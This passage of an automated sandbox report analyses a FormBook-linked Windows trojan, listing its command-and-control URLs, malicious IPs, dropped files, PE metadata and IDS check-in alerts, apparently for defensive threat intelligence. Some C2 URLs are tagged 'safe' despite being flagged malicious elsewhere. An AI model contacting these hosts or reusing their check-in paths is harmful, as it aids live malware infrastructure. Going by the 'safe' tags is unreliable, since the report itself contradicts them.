                                                		unknown
                                                http://www.hm35s.top/lazq/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.cssa.auction/rjvg/?GX6Lp2F=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MhCYnHJ28VWxL0fj0Y8TMYCyxad2qg==&H8=BpFD-28hKhrDtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.windsky.click/gybb/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.717hy.net/bokt/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.tempatmudisini06.click/4iun/?GX6Lp2F=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpudeeEuZLaZHAlqHDud2TkhyZZeYQxg==&H8=BpFD-28hKhrDtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.cssa.auction/rjvg/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bookingservice.center/47f1/true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabregini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoregini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://kb.fastpanel.direct/troubleshoot/regini.exe, 00000007.00000002.3756768985.0000000003DEE000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3759140803.0000000005A90000.00000004.00000800.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3755312225.0000000003F9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://www.izmirescortg.xyzQmkRHPDwxbW.exe, 00000008.00000002.3757593564.0000000005890000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://tempuri.org/ianiDataSet2.xsdMfile.exefalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/ianiDataSet.xsdfile.exefalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.comregini.exe, 00000007.00000002.3759140803.0000000005A90000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3756768985.0000000004436000.00000004.10000000.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3755312225.00000000045E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/ianiDataSet1.xsdfile.exefalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            209.74.77.109
                                                                            		www.moviebuff.infoUnited States
                                                                            		31744MULTIBAND-NEWHOPEUStrue
                                                                            199.59.243.227
                                                                            		www.whisperart.netUnited States
                                                                            		395082BODIS-NJUStrue
                                                                            154.23.184.95
                                                                            		hm35s.topUnited States
                                                                            		174COGENT-174UStrue
                                                                            172.67.162.39
                                                                            		www.sitioseguro.blogUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            107.167.84.42
                                                                            		cssa.auctionUnited States
                                                                            		53755IOFLOODUStrue
                                                                            74.208.236.156
                                                                            		www.christinascuties.netUnited States
                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                            103.21.221.4
                                                                            		tempatmudisini06.clickunknown
                                                                            		9905LINKNET-ID-APLinknetASNIDtrue
                                                                            46.253.5.221
                                                                            		www.windsky.clickBulgaria
                                                                            		44814BTEL-BG-ASBGtrue
                                                                            88.198.8.150
                                                                            		snehasfashion.shopGermany
                                                                            		24940HETZNER-ASDEtrue
                                                                            68.66.226.92
                                                                            		www.717hy.netUnited States
                                                                            		55293A2HOSTINGUStrue
                                                                            74.48.143.82
                                                                            		bpgroup.siteCanada
                                                                            		14663TELUS-3CAtrue
                                                                            172.67.186.192
                                                                            		www.izmirescortg.xyzUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            98.124.224.17
                                                                            		www.bookingservice.centerUnited States
                                                                            		21740ENOMAS1UStrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1561747
                                                                            Start date and time:2024-11-24 08:20:19 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 11m 13s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:12
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:file.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@13/13
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 96%
                                                                            • Number of executed functions: 117
                                                                            • Number of non-executed functions: 301
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target QmkRHPDwxbW.exe, PID 5988 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            02:21:11API Interceptor2x Sleep call for process: file.exe modified
                                                                            02:22:09API Interceptor10114548x Sleep call for process: regini.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            209.74.77.109PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                            • www.gogawithme.live/6gtt/
                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • www.gogawithme.live/6gtt/
                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                            • www.gogawithme.live/6gtt/
                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                            • www.dailyfuns.info/n9b0/
                                                                            199.59.243.227TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                            • www.timetime.store/wxr5/
                                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                            • www.acond-22-mvr.click/w9z4/
                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • www.acond-22-mvr.click/w9z4/
                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                            • www.acond-22-mvr.click/w9z4/
                                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                            • www.bcg.services/mxde/?KV=8xKxkpsUUE6O2YGNwLnJ/+WM1qqfoI8NOsOkZIrS/NSsfWu+QjWct9+gZKiyGOAYB5Pljgx8M21MT9QArezJJe5Vce6MQIBegnnKKN1EkLTSu1v+eqsUQ+w=&Wno=a0qDq
                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                            • www.bcg.services/xz45/
                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                            • www.dating-apps-az-dn5.xyz/pn0u/
                                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                                            • www.bcg.services/5onp/
                                                                            Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                            • www.migraine-massages.pro/ym43/
                                                                            http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                            • ww88.inscrit.es/_tr
                                                                            154.23.184.95Maryam Farokhi-PhD- CV-1403.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wcp95.top/nv0k/
                                                                            shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wcp95.top/1bs4/
                                                                            fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wcp95.top/x8cs/
                                                                            SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wcp95.top/1bs4/
                                                                            icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wcp95.top/x8cs/
                                                                            DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wcp95.top/rj0s/
                                                                            DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wcp95.top/rj0s/
                                                                            COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                            • www.hm23s.top/jd21/?FPTX=E8EgvcVhhAQQFir9OK6E+Mqm7tqMiVehFrZTPh8pbZDzIj0aN6RyatkqXtPCo6PBps4o&BlO=O0DXpF3H2

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.bookingservice.centerDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                            • 98.124.224.17
                                                                            FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                            • 98.124.224.17
                                                                            www.717hy.netItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                            • 68.66.226.92
                                                                            www.sitioseguro.blogSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.162.39
                                                                            5674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.15.100
                                                                            www.izmirescortg.xyzThermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.36.62

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            BODIS-NJUSTAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                            • 199.59.243.205
                                                                            CLOUDFLARENETUSCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.168.228
                                                                            CargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 172.67.191.199
                                                                            ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.67.152
                                                                            VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.44.16
                                                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.145.234
                                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.168.228
                                                                            Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 104.21.67.152
                                                                            TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.76.162
                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 172.67.162.84
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 172.67.174.133
                                                                            COGENT-174USCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                            • 38.54.112.227
                                                                            TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                            • 206.119.82.148
                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.23.184.194
                                                                            arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 204.77.18.147
                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 38.24.59.144
                                                                            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 38.200.234.198
                                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 38.85.133.234
                                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 38.251.1.250
                                                                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 38.116.131.10
                                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 38.134.93.88
                                                                            MULTIBAND-NEWHOPEUSVSP469620.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.108
                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.108
                                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.107
                                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.109
                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.109
                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.109
                                                                            Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.108
                                                                            http://mt6j71.p1keesoulharmony.com/Get hashmaliciousHTMLPhisher, EvilProxyBrowse
                                                                            • 209.74.95.101
                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.108
                                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.107

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1216
                                                                            Entropy (8bit):5.34331486778365
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                            C:\Users\user\AppData\Local\Temp\7046-nn1K

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\regini.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                            Category:dropped
                                                                            Size (bytes):196608
                                                                            Entropy (8bit):1.1211596417522893
                                                                            Encrypted:false
                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.556527254696405
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:file.exe
                                                                            File size:1'026'560 bytes
                                                                            MD5:df31a2ccd06e0f1075f7280d156f5237
                                                                            SHA1:d2583bb274455234c26d299931edf04537bc76ef
                                                                            SHA256:2e64ed10f0c61a872dbc4cc8ac023e947db0c9642044dbe33af671cff97135a0
                                                                            SHA512:6e195da7fdae985df52d87d87b1fe9013c037ee78cd253a69969c07165755a800fdc853c8e5525e833235969acbcff11bac7d4ecb1b89b34665bff9214668c3d
                                                                            SSDEEP:24576:rzJkzxWpwSGN8LOYrMOUHWMm2iqVW8gS:rzJCW9GGH1xMPiqUG
                                                                            TLSH:1925BF20B7F89D67E27AA1F3DB84421097B6D141767BE7AA0CC664CE26C27310783D27
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0......(........... ........@.. ....................................@................................

                                                                            File Icon

                                                                            Icon Hash:130b253d1931012d

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4f9f86
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x673E8CC7 [Thu Nov 21 01:28:39 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add al, 00h
                                                                            add eax, dword ptr [eax]
                                                                            add byte ptr [eax], al
                                                                            xor byte ptr [eax], al
                                                                            add byte ptr [eax+0000000Eh], al
                                                                            pushad
                                                                            add byte ptr [eax], al
                                                                            adc byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            nop
                                                                            add byte ptr [eax], al
                                                                            sbb byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            rol byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add dword ptr [eax], eax
                                                                            add dword ptr [eax], eax
                                                                            add byte ptr [eax], al
                                                                            dec eax
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf9f340x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xfa0000x2588.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xfe0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000xf7f8c0xf80002b9d2a14d6d27ee980580366adf1d20cFalse0.7489820911038306data7.558811288088065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xfa0000x25880x2600e48c7a4f0adf2d991907ee0ce26bd908False0.8754111842105263data7.577346493614373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xfe0000xc0x2007b1861b0e2b6e98c24f4e599da8719deFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xfa1000x2016PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9504504504504504
                                                                            RT_GROUP_ICON0xfc1280x14data1.05
                                                                            RT_VERSION0xfc14c0x23cdata0.46853146853146854
                                                                            RT_MANIFEST0xfc3980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-24T08:21:48.178527+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104978674.48.143.8280TCP
                                                                            2024-11-24T08:22:05.420659+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104982798.124.224.1780TCP
                                                                            2024-11-24T08:22:08.089249+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104983398.124.224.1780TCP
                                                                            2024-11-24T08:22:10.819509+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104983998.124.224.1780TCP
                                                                            2024-11-24T08:22:13.321614+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104984698.124.224.1780TCP
                                                                            2024-11-24T08:22:20.816133+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049862103.21.221.480TCP
                                                                            2024-11-24T08:22:23.488075+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049870103.21.221.480TCP
                                                                            2024-11-24T08:22:26.144464+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049878103.21.221.480TCP
                                                                            2024-11-24T08:22:28.903617+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049885103.21.221.480TCP
                                                                            2024-11-24T08:22:36.284996+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049901154.23.184.9580TCP
                                                                            2024-11-24T08:22:38.941250+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049909154.23.184.9580TCP
